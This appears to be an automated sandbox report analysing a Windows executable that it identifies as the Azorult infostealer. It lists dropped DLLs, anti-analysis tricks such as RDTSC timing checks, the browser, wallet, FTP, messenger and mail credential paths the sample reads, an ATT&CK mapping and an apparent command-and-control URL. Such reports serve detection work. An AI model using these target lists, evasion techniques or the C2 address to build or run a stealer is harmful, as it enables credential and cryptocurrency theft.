                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeAPI/Special instruction interceptor: Address: 374BC00
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeAPI/Special instruction interceptor: Address: 250BC00
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeRDTSC instruction interceptor: First address: 36E26CD second address: 36E26CD instructions: 0x00000000 rdtsc 0x00000002 cmp cl, al 0x00000004 test dx, bx 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F5861222680h 0x0000000b test ah, dh 0x0000000d inc ebp 0x0000000e test bx, bx 0x00000011 inc ebx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeRDTSC instruction interceptor: First address: 24A26CD second address: 24A26CD instructions: 0x00000000 rdtsc 0x00000002 cmp cl, al 0x00000004 test dx, bx 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F58611DA0E0h 0x0000000b test ah, dh 0x0000000d inc ebp 0x0000000e test bx, bx 0x00000011 inc ebx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nss3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy4AC1.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_0040676F FindFirstFileW,FindClose,0_2_0040676F
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B23
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_0040676F FindFirstFileW,FindClose,9_2_0040676F
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_00402902 FindFirstFileW,9_2_00402902
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_00405B23
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.00000000068C8000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000690F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeAPI call chain: ExitProcess graph end nodegraph_0-4305
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeAPI call chain: ExitProcess graph end nodegraph_0-4457
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_6EDF1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EDF1B5F
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess created: C:\Users\user\Desktop\No. 1349240400713.exe "C:\Users\user\Desktop\No. 1349240400713.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Azorult
                  Source: Yara matchFile source: 00000009.00000003.1880587120.0000000037070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1879186394.0000000037054000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: No. 1349240400713.exe PID: 1916, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: Yara matchFile source: 9.3.No. 1349240400713.exe.374ad227.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.No. 1349240400713.exe.374a8abf.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.No. 1349240400713.exe.374a4355.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000003.1880512323.00000000378C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1880531746.00000000378CC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: No. 1349240400713.exe PID: 1916, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Access Token Manipulation                  		11
                  Masquerading                  		2
                  OS Credential Dumping                  		21
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                  Process Injection                  		1
                  Access Token Manipulation                  		2
                  Credentials in Registry                  		3
                  File and Directory Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Credentials In Files                  		215
                  System Information Discovery                  		SMB/Windows Admin Shares4
                  Data from Local System                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDSSystem Network Configuration DiscoveryDistributed Component Object Model1
                  Clipboard Data                  		14
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  No. 1349240400713.exe5%ReversingLabs

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\nss3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\nsy4AC1.tmp\System.dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  http://www.mozilla.com00%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://apis.google.com0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://89.40.31.232/12/index.phpw0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.phpde0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.php60%Avira URL Cloudsafe
                  https://drive.google.com/sv0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.php0%Avira URL Cloudsafe
                  http://89.40.31.232/12/index.phpept-Ra0%Avira URL Cloudsafe
                  https://drive.usercontent.google.com/0%Avira URL Cloudsafe
                  http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
